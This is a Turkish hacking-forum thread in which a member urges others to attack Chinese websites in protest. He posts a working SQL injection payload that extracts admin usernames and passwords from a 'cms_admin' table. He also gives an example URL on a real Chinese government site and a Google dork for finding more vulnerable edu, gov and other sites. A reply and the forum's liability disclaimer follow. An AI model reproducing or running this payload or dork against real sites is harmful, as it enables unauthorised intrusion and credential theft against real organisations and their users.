Çin sitelerinde bulunan güncel SQL İnjection Exploit

_RoC_

Kıdemli Üye
28 Şub 2009
3,134
0
35
Istanbul
Evet Arkadaşlar Öncelikle Çin'i Hepimiz Kınıyoruz..Ve de Tepkimizi Sanal Alemde Bu Şekilde Verebileceğimizi Umuyorum..Sizlere Güncel Bir Açık Sunmak İstedim..Umarım Yararlı Olur...
Ve Çin'e Tepkimizi Bu Şekilde Göstermiş Oluruz..Uğraşırsanız Bir Sürü Site Var...Örnek Bir Site de Verdim..

Google Aratma;

http://www.google.com.tr/search?q=in...&start=10&sa=N

Exploit ;
/news/List.php?cid=-65+union+select+concat(username,0x3a,password),2+f rom+cms_admin+limit+0,1--

Örnek Site ;
http://www.shuangliu.gov.cn/news/List.php?cid=-65+union+select+concat(username,0x3a,password),2+f rom+cms_admin+limit+0,1--

Bu Arada Google Dork ;

inurl:"/news/List.php?cid=" "edu"
gov,edu,net,info v.s Şeklinde genişletilebilir.


By _RoC_
 

astalavistaxxx

Yeni üye
7 Ağu 2009
3
0
burda alıntı yapmayanmı var. çoğu alıntı yapıyor. nasıl yapıldıgını sorsan cvp bile veremiyolar. çünkü artislik olsun diye sağdan soldan kopyalayıp buraya koyuyorlar. milletin gözünde bişeyler biliyor gibi görünmek için. çoğuda ilköğretim lise bebesi.

qüzéL payLaşım ancaK aLıntı yazsan daha da qüzéL oLurdu ;)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.